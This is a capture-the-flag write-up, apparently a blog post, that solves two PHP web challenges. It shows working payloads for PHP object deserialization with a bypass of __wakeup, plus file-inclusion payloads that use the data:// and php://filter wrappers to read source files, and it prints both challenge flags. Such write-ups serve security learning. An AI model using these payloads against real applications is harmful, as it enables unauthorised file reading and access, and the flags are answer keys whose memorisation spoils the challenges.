[Geek Challenge 2019] PHP
Table of contents
topic
answer
Enter the range environment
According to the prompt given to me by the title, there is a backup of this website, try to blast the directory of the website
Tool: dirmap
The backup file of the website was discovered by blasting, after visiting, download it to the local, and observe its content
Found flag.php, opened it to view, and found that it was not what we wanted, and continued to view other source code files
Found some tricks in the source code of index.php and class.php
found in index.php:
Obtaining the select parameter is passed through the get method, and deserializing the value of the obtained select parameter
In class.php:
Two variables username and password are defined
private (private) : Private class members can only be accessed by the class in which they are defined
source code:
<?php
include 'flag.php';
error_reporting(0);
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function __wakeup(){
$this->username = 'guest';
}
function __destruct(){
if ($this->password != 100) {
echo "</br>NO!!!hacker!!!</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
die();
}
}
}
?>
If you find multiple serialization functions such as function __construct, function __wakeup(), function __destruct(), etc., then there must be deserialization. Through the above code, it is found that select passes parameters through get in index.php
补充:
常用的内置方法:
__construct():创建对象时初始化,当一个对象创建时被调用
__wakeup() 使用unserialize时触发 //反序列化
__sleep() 使用serialize时触发 //序列号
__destruction():结束时销毁对象,当一个对象销毁时被调用
In turn, observe the code of class.php, mainly to verify two conditions, username and password, username is admin, password is 100
Next, make the serial number, instantiate the class, and serialize to get the string
Construct payload:
code:
<?php
class Name{
private $username = 'admin';
private $password = '100';
}
$name = new Name;
print(serialize($name));
//echo 输出也可以
//echo serialize($name)
?>
operation result:
Replace the box with %00, the url of the box cannot be recognized, if it is not written, the length will be reduced, and the purpose cannot be achieved;
O:4:"Name":2:{
s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}
But there is another function, __wakeup() will reassign the username to "guest", so you need to find a way to bypass the __wakeup() function
在反序列化字符串时,属性个数的值大于实际属性个数时,会跳过 __wakeup()函数的执行
原本:O:4:"Name":2:{
s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
绕过:O:4:"Name":3:{
s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
Right now
绕过:
O:4:"Name":3:{
s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}
payload:
index.php?select=O:4:"Name":3:{
s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
Successfully obtained the flag
The flag of this question is:
flag{b18bb0c2-8084-4e65-a402-f1803a87f80d}
[ZJCTF 2019] NiZhuanSiWei
topic
answer
open range environment
It is found that it is the source code of the webpage. After analysis, the three parameters are text, file, and password, which are passed through the get method. In the if control statement, set the text variable and read the data in the file. It must be equal to welcome to the zjctf will return true
Next, you need to use the php pseudo-protocol data included in the file to construct the payload
payload:
?text=data://text/plain,welcome to the zjctf
Through the second if control statement, we found that the flag is filtered out through the regular expression. When the file parameter is passed in, if there is a flag, it will be filtered out. We will then use the next sentence, the file contains, we try to go Get the source code of useless.php, see what information it is, and construct the payload again
The php pseudo-protocol php://filter included in the file is used again to obtain source code information
payload:
?text=data://text/plain,welcome to the zjctf&file=php://filter/read=convert.base64-encode/resource=useless.php
After the acquisition is successful, it is base64 encoded, and we will decode it next
After decoding, get the code
<?php
class Flag{
//flag.php
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("U R SO CLOSE !///COME ON PLZ");
}
}
}
?>
We found that the password parameter was deserialized in the initial source code, so we serialized the decrypted code we just obtained, assigned it to the password parameter, and deserialized it
unserialize() 函数用于将通过 serialize() 函数序列化后的对象或数组进行反序列化,并返回原始的对象结构。
Serialization processing:
<?php
class Flag{
//flag.php
public $file="flag.php"; //需要将flag.php文件赋值给$file
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("U R SO CLOSE !///COME ON PLZ");
}
}
}
$passwd = new Flag;
echo serialize($passwd);
?>
The output is:
O:4:"Flag":1:{
s:4:"file";s:8:"flag.php";}
Construct the payload again:
password参数进行反序列化处理
/?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
After the execution is complete, view the interface:
View the source code of the web page:
Successfully obtained flag information
The flag of this question is:
flag{1b3bf4a9-e129-4477-9e99-e9bc49c2d3c3}
Summarize:
第一:我们拿到靶场环境后,观察源代码,发现需要我们传递的参数,并且是get方式进行传递,所以可以直接在url当中操作(HackBar),根据代码分析,需要用到文件包含伪协议data://,进行获取数据,然后通过函数读取里面的字符串进行匹配是否相等
第二:根据if控制语句当中的函数发现flag被正则过滤掉,所以无法查找flag文件,这时候我们需要根据源码当中的提示进行访问读取useless.php 源码信息,这里又一次需要用到文件包含伪协议php://filter来读取源码,读取的字符串格式为base64编码,得到的字符串通过base64进行解密,得到代码。
通过观察源码当中的password参数,发现存在反序列化处理。将解密得到的源码,进行反序列化处理。从而得到password
注:unserialize() 函数用于将通过 serialize() 函数序列化后的对象或数组进行反序列化,并返回原始的对象结构。
第三:构造payload,拿到flag
If the article is inappropriate, criticism and correction are welcome!